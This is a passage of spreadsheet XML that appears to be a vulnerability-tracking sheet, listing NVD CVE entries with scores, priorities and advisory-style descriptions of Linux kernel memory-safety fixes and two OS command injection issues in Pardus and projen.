      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software allows OS Command Injection.
This issue affects Pardus Software: before 1.0.5.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7863</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80932</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vsock/virtio: flush works in dependency order
virtio_vsock_remove() stops the virtqueues and then flushes each work
item before freeing the enclosing virtio_vsock.  The current order does
not account for dependencies between those items: tx_work may queue
send_pkt_work, and send_pkt_work may queue rx_work.
In particular, send_pkt_work can set restart_rx and release tx_lock.
The remove path can then stop the queues and flush rx_work before
send_pkt_work queues it.  Although the later send_pkt_work flush waits
for that producer to finish, nothing waits for the newly queued rx_work,
so kfree(vsock) can race with it.
KASAN reported:
  BUG: KASAN: slab-use-after-free in
  virtio_transport_rx_work+0x487/0x4b0
  Read of size 8 at addr ffff888114c2b008 by task kworker/1:1/47
  Workqueue: virtio_vsock virtio_transport_rx_work
  Call Trace:
   virtio_transport_rx_work+0x487/0x4b0
   process_one_work+0x688/0x1120
   worker_thread+0x45b/0xd10
  Allocated by task 1:
   virtio_vsock_probe+0xef/0x6b0
  Freed by task 84:
   kfree+0x131/0x3c0
   virtio_vsock_remove+0xd1/0x100
Flush the works in producer-to-consumer order.  virtio_vsock_vqs_del()
has already disabled the queue callbacks and cleared the run flags, so
after tx_work and send_pkt_work are drained, no source remains that can
queue rx_work after its flush.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80932</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80953</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: adi: initialize the lock before enabling interrupts
adi_i3c_master_probe() requests the IRQ and unmasks REG_IRQ_PENDING_CMDR
before the controller's IBI state, transfer queue list and transfer
queue lock are initialized.  A pending CMDR interrupt can therefore run
adi_i3c_master_irq() and take master-&gt;xferqueue.lock before the dynamic
lock has been initialized.
This issue was found by our static analysis tool and then manually
reviewed against the current tree.
The grounded PoC kept the probe ordering and the IRQ path
adi_i3c_master_probe() -&gt; adi_i3c_master_irq() -&gt; xferqueue.lock, with a
pending CMDR interrupt arriving after REG_IRQ_PENDING_CMDR is unmasked.
Lockdep reported:
  INFO: trying to register non-static key.
  you didn't initialize this object before use?
  lock_acquire+0xbb/0x290
  _raw_spin_lock_irqsave+0x36/0x60
  adi_i3c_master_irq+0x32/0x56 [vuln_msv]
  adi_i3c_master_probe+0x5a/0xf47 [vuln_msv]
Initialize the transfer queue and IBI state before requesting and
unmasking the IRQ.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80953</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80967</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcxhr: initialize mutexes before requesting threaded IRQ
pcxhr_probe() requests pcxhr_threaded_irq() before initializing
mgr-&gt;lock, even though the threaded handler takes that mutex.
Initialize the manager locks before request_threaded_irq() so an
early interrupt cannot run against uninitialized mutex state during
probe.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80967</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81004</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi:msghandler: Cancel work cleanly on an error
If an error occurs during startup of an IPMI interface, it may have
scheduled work to run.  The work needs to be canceled before the
interface can be freed.</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81004</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81012</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: fix off-by-one write in hp_get_string_from_buffer()
hp_get_string_from_buffer() clamps the converted string length against
the destination buffer size with "size &gt; dst_size", so when the
converted length is exactly equal to dst_size, conv_dst_size is left
at dst_size and the unconditional NUL terminator write
	dst[conv_dst_size] = 0;
lands one byte past the destination buffer. This is the same shape of
bug as the previously fixed off-by-one in hp_convert_hexstr_to_str():
the buffer is sized correctly for the content, but the terminator
write is never checked against that size.
Fix by changing the comparison to "&gt;=" so conv_dst_size is always left
with room for the terminator.
All fixed-size destinations that reach this function (path[512],
current_value[512], current_password/current_value[64], and the
per-entry buffers in encodings[][512] and prerequisites[][512]) are
affected.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81012</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81017</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: sensorhub: Bound the EC-reported sensor number
Each EC FIFO event carries an 8-bit sensor number (in-&gt;sensor_num).
cros_ec_sensorhub_ring_handler() validates the FIFO event count, the
per-read count and the ring bound, but not the sensor number, which
cros_ec_sensor_ring_process_event() then uses unchecked to index
sensorhub-&gt;batch_state[] - allocated with only sensorhub-&gt;sensor_num
entries. A sensor number of sensor_num or larger is an out-of-bounds
read and write of batch_state[].
Validate the sensor number in the ring handler, where each event is read
from the EC, and drop a malformed event before it is used.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81017</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89066</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command in the task synthesis component in projen before 0.103.0 might allow context-dependent attackers to execute arbitrary commands on a developer workstation or continuous integration runner via shell metacharacters in project configuration values and repository file names that are interpolated into generated task definitions.
To remediate this issue, users should upgrade to version 0.103.0 and then re-synthesize the project so that .projen/tasks.json is regenerated with the corrected task definitions. Upgrading alone is not sufficient because the generated task definition file is committed to the repository.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89066</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89452</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/msm: Unwind probe state on registration failure
msm_iommu_probe() adds its devm-managed IOMMU object to
qcom_iommu_devices before adding the IOMMU sysfs device and registering
it with the IOMMU core.
If iommu_device_sysfs_add() fails, probe returns with the object still on
qcom_iommu_devices. The driver core then releases the devm allocation,
leaving a dangling list entry that later list walks may dereference.
If iommu_device_register() fails, the same dangling list entry remains
and the sysfs device is left registered as well.
Unwind the sysfs device and global list entry in reverse setup order on
the corresponding failure paths.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89452</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89465</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: rt9455: quiesce delayed work before teardown
The threaded IRQ handler can queue pwr_rdy_work,
max_charging_time_work and batt_presence_work.  pwr_rdy_work and
batt_presence_work can also queue max_charging_time_work, while
batt_presence_work can requeue itself.
rt9455_remove() cancels max_charging_time_work before
batt_presence_work.  The latter can therefore queue
max_charging_time_work after it has already been cancelled:
  rt9455_remove()                   workqueue
    cancel pwr_rdy_work
    cancel max_charging_time_work
                                      batt_presence_work queues
                                        max_charging_time_work
    cancel batt_presence_work
    return
    devres frees rt9455_info
                                      max_charging_time_work dereferences
                                        rt9455_info
The IRQ also remains registered until devres cleanup and can queue more
work after any of the cancellation calls.  If rt9455_hw_init() fails
after the IRQ has been requested, probe returns without cancelling work
that may already have been queued.  A pending callback can then access
rt9455_info after it has been freed.
Register rt9455_cancel_all_delayed_works() through
devm_add_action_or_reset() right after devm_power_supply_register().
devres invokes the action in reverse registration order, after the
managed IRQ has been freed and before rt9455_info is released, so the
delayed works are drained in both rt9455_remove() and the probe error
path.  Cancel pwr_rdy_work and batt_presence_work before
max_charging_time_work because both can queue the latter.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89465</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89469</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: lp8727: fix use-after-free in lp8727_release_irq()
lp8727_isr_func(), the threaded IRQ handler, is the only caller that arms
pchg-&gt;work via schedule_delayed_work().  lp8727_release_irq() currently
cancels the work before freeing the IRQ, so an IRQ delivered in between
can re-arm the work through the threaded handler.  After .remove returns
the devm layer frees pchg while lp8727_delayed_func() may still run and
dereference it.
Free the IRQ first so the threaded handler is quiesced and can no longer
queue work, then cancel the delayed work to drain the final generation.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89469</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89470</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: cros_usbpd: Limit port counts to EC_USB_PD_MAX_PORTS
Currently the cros_usbpd-charger driver probe iterates based on raw
charger port count returned by the embedded controller. The only check
is against the number of USB PD ports which the embedded controller
also defines. A malicious embedded controller could return an inaccurate
port count (up to 255) resulting in an out of bounds write and
subsequent memory corruption.
Update helper functions in cros_usbpd-charger to limit port counts to
EC_USB_PD_MAX_PORTS.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89470</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89471</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: cros_usbpd-charger: bound the EC-reported port count
cros_usbpd_charger_probe() reads two port counts from the EC and uses
one of them, num_charger_ports, as the loop bound when populating a
fixed-size array:
	struct port_data *ports[EC_USB_PD_MAX_PORTS];	/* 8 entries */
	...
	for (i = 0; i &lt; charger-&gt;num_charger_ports; i++)
		charger-&gt;ports[charger-&gt;num_registered_psy++] = port;
Both num_usbpd_ports (from EC_CMD_USB_PD_PORTS) and num_charger_ports
(from EC_CMD_CHARGE_PORT_COUNT) are u8 values reported by the EC. The
only validation is a sanity check that compares the two EC-reported
values against each other:
	if (num_charger_ports &lt; num_usbpd_ports ||
	    num_charger_ports &gt; num_usbpd_ports + 1)
		return -EPROTO;
It never checks either count against EC_USB_PD_MAX_PORTS, the size of
the ports[] array. A malfunctioning, malicious or compromised EC that
reports num_usbpd_ports == num_charger_ports == N for any N &gt; 8 (for
example both 255) passes this check, and the loop then writes N pointers
into the 8-entry ports[] array embedded in the devm_kzalloc()'d
charger_data, overflowing it by up to 255 - 8 = 247 entries (~1976
bytes): a slab out-of-bounds write.
Reject a port count larger than the ports[] array can hold.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89471</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89504</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
regulator: as3722_get_regulator_dt_data: fix premature of_node_put leaving dangling of_node pointer
In as3722_get_regulator_dt_data(), of_get_child_by_name() acquires a
reference on np, which is then assigned to pdev-&gt;dev.of_node. The
function immediately calls of_node_put(np), releasing the reference and
leaving pdev-&gt;dev.of_node as a dangling pointer.
Remove the of_node_put(np) call to let the device hold the reference.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89504</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89560</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
